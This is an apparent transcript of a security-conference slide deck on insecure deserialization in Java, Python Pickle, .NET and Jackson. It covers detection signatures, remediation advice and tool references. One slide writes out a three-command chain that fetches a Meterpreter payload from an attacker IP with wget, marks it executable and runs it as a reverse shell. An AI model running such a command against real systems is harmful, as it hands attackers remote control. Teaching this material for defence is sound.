how to be an app serial killer...don't be scared!!! (or bored )-if you know nothing about this...
Post on 05-Feb-2020
3 Views
Preview:
TRANSCRIPT
How to be an App Serial KillerR E B E C C A D E C K
A V A L A R A
@ R A N G E R _ C H A
DON'T BE SCARED!!! (or bored)
- If you know nothing about this topic…
-Hopefully you understand 25%
- If you know a little about the topic…
-50-75%
- If you are really solid in your knowledge of the topic…
-Learn one or two new things
2
Objective
-Deserialization Background
-Normal Deserialization
-Finding Deserialization Issues
-Deserialization Exploitation
3
Deserialization Background
https://me.me/i/confused-cat-meme-generator-imgflip-19c02328bba745a5b799c1b94446353d4
September 29, 2019
Serialization from the beginning…
What is an object?
Collection of values that works as a single unit
5
Serialization from the beginning…
Process of preparing objects for network transport
Also called marshalling
What does serialization look like?
6
Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
Deserialization
Deserialization is the reverse of serialization
Usually from a readObject call (in Java)
Common in many languages
Force server to load an unexpected object
Often execute arbitrary code
7
Transferring Data with Serialization
8
Server
Serializes
Client
Deserializes
Client
Serializes
Server
Deserializes
Server
Serializes
Writes Data to
Disk/Memcache
Server
Deserializes
Malicious Objects
9
Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Deserialization Remediation
How do you fix it?Upgrade for…
Blacklisting???
Nooooo
Hard to write signatures
10https://sayingimages.com/cat-meme/
Deserialization Remediation
Look-ahead DeserializationOverload resolveClass
Ensure that the object is of thecorrect class
JUST DON'T DO IT
Do something better like default JSON parsers
11http://takomatorch.com/index.php/2019/07/13/takoma-park-police-adopt-new-enforcement-tactic-based-on-cat-discipline/
Finding Deserialization
September 28, 2019 12
White Box
Talk to developers
Look for deserialization calls
Java – readObject
Python – Pickle
.NET – TypeNameHandling, JavaScriptTypeResolver
Jackson – enableDefaultTyping, setSerializationInclusion, readValue
13
Black Box
Look for objects
Java – rO0, ACED0005, application/x-java-serialized-object
.NET – AAEAAAD/////, TypeObject, $type:
Python –
JSON – ["objtype",{"name": "value"}]
14
Exploiting Deserialization
September 28, 2019 15
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Look for deserialization calls
16
Pickle Deserialization Exploit Class
Create a class that executes code when created
17
Pickle Send Exploit
Send exploit to server
How depends on the app
18
Deserialization in Java
Look for raw Java objects
Find a suitable gadget (object to run code when loaded)Must be an object the app understands
Ysoserial provides several gadgetshttps://github.com/frohoff/ysoserial
19
Deserialization in Java
Vulnerable app https://github.com/hvqzao/java-deserialize-webapp
Includes Apache Commons Collection
Ysoserial exploit only runs one command
Reverse shell in three commandswget IP/meterpreterchmod +x meterpreter./meterpreter
20
Deserialization in Java Example
21
Deserialization in Java Example
22
Deserialization in Java Example
23
Deserialization in Java Example
24
No Java Objects?
Safe without Java objects?
Moar gadgetshttps://github.com/mbechler/marshalsec
Same idea, different formatJSON, XML
25
Jackson Deserialization
26
Jackson Deserialization
27
Jackson Deserialization
28
Jackson Deserialization
29
Summary
• Ysoserial and marshalsec for exploit gadgets
• Find by looking for common serialized object magic numbers or deserialization routines in code
• Often “Fix” Deserialization by blacklisting classes (need patch)
• Better off rewriting the data serialization method
• Use safer (less full-featured) libraries
30
References
Look-ahead Java Deserialization
https://www.ibm.com/developerworks/java/library/se-lookahead/index.html
31
References
Deserialization Resources
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md
Marshalling Pickles
http://frohoff.github.io/appseccali-marshalling-pickles/
ysoserial
https://github.com/frohoff/ysoserial
Deserialization – Different marshallers
https://github.com/mbechler/marshalsec
32
References
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Java Deserialization app
https://github.com/hvqzao/java-deserialize-webapp
Jackson Deserialization
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
33
Questions?
34
www.directdefense.comwww.directdefense.com
top related